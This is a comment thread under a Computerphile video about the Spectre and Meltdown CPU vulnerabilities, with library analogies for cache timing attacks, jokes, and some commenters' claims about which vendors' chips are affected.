Spectre & Meltdown - Computerphile

Best Analogy I've seen is as follows:

"Imagine that you (i.e. a malicious process) want to know whether someone (i.e. a victim process) has checked out a particular library book. The library (i.e. the CPU) refuses to give you access to their records and does not keep a slip inside the front cover. You can only see the record of which books you have checked out.

What you do is follow the person of interest into the library whenever they return a book. You then ask the librarian for a copy of the books you want to know whether the person has checked out. If the librarian looks down and says "You are in luck, I have a copy right here!" then you know the person had checked out that book. If the librarian has to go look in the stacks and comes back 5 minutes later with the book, you know that the person didn't check out that book (this time).

The way to make the library secure against this kind of attack is to require that all books be reshelved before they can be lent out again, unless the current borrower is requesting an extension.

There are many other ways to use the behavior of the librarian and the time it takes to retrieve a book to figure out which books a person is reading."

Not mine, don't know original source.

Craznar

Thanks for getting a video out on this so quickly and pretending not to panic for the camera.

Can we see the cut shots where Dr Bagley is shouting "WE'RE ALL DOOMED" and Brady is talking him down from the window ledge.

nikanj

Summary of the exploit: "Cache me outside... how bout dat?"

RangeWilson

The real scandal is that Intel was notified about this over 6 months ago and their CEO dumped millions in stock before announcing this exploit.

ropro

This is the best analogy I could come up with for how Spectre works:

Imagine you want to know the genre of book a particular person has checked out of the library. However, the library has strict privacy policies, and refuses to give you access to their records, only your own.

What you do is reserve a book from every genre that the library carries, and then ask the librarian for the book you reserved of the same genre as the victim's book. The librarian, to save time, immediately begins fulfilling this request, even bringing said book up to the front desk, before finally realizing that the request itself breaches library privacy, and so refuses to return the book to you. Seems like you're out of luck, you don't know the genre of your reserved book behind the desk, so you haven't learned the genre of the victim's book.
However, you now begin to request from the librarian every book you reserved one by one. Since these reserved books are properly a part of your records, the librarian happily obliges. For each book you note the librarian takes time to retrieve the book from inside the library, until one suspicious book is requested, which the librarian immediately hands you from behind the desk. That one suspicious book of course is the book requested from earlier, so with it identified and in your possession, you have successfully learned the genre of your victim's book.

Now imagine repeating this process multiple times on the same victim using other qualities besides genre: like author, publisher, and so on. Each quality you learn about your victim's book allows you narrow down to the particular book your victim has checked out. Eventually, you will know for certain the identity of your victim's book, all by exploiting your hard working and naive librarian.

Mpire

I knew you’d post a video about it quickly! This is why I’m a happy subscriber

mattshilling

So this is extremely low-level and thus hard for my high-level programmer brain to fully grasp, but let me see if I got this straight: if the bounds of a loop are stored in memory, the CPU will try to optimize by running the code in the loop first while waiting for the bounds to be retrieved; if the bounds turn out to be such that the loop shouldn't have been run, the result of the code is discarded. But when a value is taken from memory and used as an array index, those values are cached to speed up future reads, and the cache is not cleared during that "memory undo" process.

So if you try to access a memory location you shouldn't be able to inside a loop that "technically" terminates before that point, the access will still happen. And if you use that value as the index of an array you do have access to, it will be cached. At that point, the indexes of your valid array which are cached represent the values of the bytes you tried to access (the iterations of the loop beyond the slow-to-retrieve maximum bounds), so by timing how long it takes to retrieve those array entries, you can determine the values of the unauthorized bytes by interpreting the indexes of the fastest-loading array entries.

Is that correct?

IceMetalPunk

"Replace CPU hardware" *Straight face*
Laughed out loud

sada

What infuriates me is that the majority of the headlines are about the slowdown, and not about the vulnerability itself -.-

jpHasABadHandle

It looks like AMD hardware is only vulnerable to one of the three variants: the bounds check bypass. Some reports argue that this could be fixed by allowing the OS and the application code to disable speculative execution in certain circumstances. As I understand it the boundary check bypass only allows to exfiltrate data from the same process with the branch target injection being able to reach another process and the meltdown making vulnerable even the kernel. Intel and ARM hardware are afflicted by all three.

fsdfsfs

Interesting to note that all Raspberry Pi versions are invulnerable because their ARM chips either don't implement speculative branch evaluation (just branch prediction) or they don't implement it in a way that leaves traces in the cache.

jsbarretto

Finally someone with knowledge of computer engineering addresses the issue and also points that Meltdown affects Intel specifically.

DarkOfGold

Literally checked this channel for this last night! You guys are awesome! Keep up the great work!

UltimateSNPA

That was fast, I thought it would take you a week or so to discuss it.

mohamedtalaatharb

It would be awsome if you could make more in depth videos, not only on this topic, maybe including the code explanation

registratoreprimo

Fantastic job explaining these exploits! Probably the cleanest and to-the-point description I've seen on YouTube so far. You know you're doing good when your viewers can use you as a security news source. 😉

xplinux

"Meltdown" (aka "Variant 3") is an Intel issue. Yes, Intel very much wants to confuse the matter, but make no mistake, that's their fuckup. (**see comments)

cacheman

James Bond asks his mate "Mr CPU" to go wait for him at a bar. The Criminal Mastermind named "Meltdown" goes into the bar and says "I have a drink for Mr Bond here, anyone want it?" All in the bar take a while, looking around and asking "are you James Bond?", but Mr CPU instantly answers "No, he is not here", then James bond walks in...

TechyBen

After the end of Moore's Law, it turns out there's no such thing as a free lunch.

HebaruSan

Somehow Scott Manley, the guy who plays Kerbal Space Program, had a much clearer and more detailed explanation that the Computerphile channel.

xlxlxl